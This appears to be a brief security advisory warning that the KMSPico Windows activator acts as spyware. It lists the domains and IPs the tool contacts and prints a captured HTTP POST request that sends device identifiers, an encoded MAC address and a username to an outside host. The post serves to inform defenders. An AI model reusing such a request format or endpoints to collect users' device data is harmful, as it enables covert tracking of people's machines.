Spyware: Beware of the KMSPico activator tool which is used for making Windows legitimate

The famous KMSPico activator tool has been classified as a malicious binary, the tool contacts 8 domains and 14 hosts while activating the Windows environment in which is being run.

kmspico

The hosts and IPs which are connected are shown below:

cdn2.downloadcrest.com           54.230.35.82                     United States

installer.ppdownload.com         54.243.101.184                  United States

static.revenyou.com                    198.232.124.224               United States

srv.dmdataserver.com                107.21.247.138                  United States

stats.g.doubleclick.net                64.233.191.154                  United States

www.keenondownload.com      54.221.208.116                  United States

i1088.photobucket.com             192.229.163.16                  United States

cdn1.downloadcrest.com           54.230.35.14                      United States

The KMSPico mainly comminucates via ports 80 and 443.

Once we take a look at the POST traffic which is generated, we can see that information is being send to keenondownload.com which contains the MAC address of the device and some type of username.

POST /index.php HTTP/1.1 Accept: */* Content-Type: application/x-www-form-urlencoded Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729) Host: www.keenondownload.com Content-Length: 554 Connection: Keep-Alive Cache-Control: no-cache Body: Net1.1=&Net2=3.5.30729.4926SP1&Net4=4.5.51641&OSversion=NT6.3SP0&Slv=&Sysid=55BE2B545C3C71DACD1ECD50DFED0C73&Sysid1=D82EEA89B81AB3DAB442A4B1607BD260&X64=N&admin=Y&browser=FirefoxURL&cavp=%22Windows+Defender%22%3B&chver=&cmdl=KMSPico10.0.9__8173_il94690.exe&dprod=A21CC102FC6D2E696FC836585B7A35&dprod4=77B342BD3BBE5C1FF30221EF5C6FD7&exe=KMSPico10.0.9__8173_il94690&ffver=36.0.1.5542&lang_DfltUser=0409&mac=MEEwMDI3MjlDQjdEMDAwMAA%3D&machg=ZGIwMmNiMmEtYjkzYS00YjA3LWE5OWEtZTBlZmMxM2RiYjY4AA%3D%3D&name=YjlhUjVDenZ6awA%3D&netfs=-1&ts=1438624280&ver=1.1.5.26

You can read the full report on the KMSPico application here.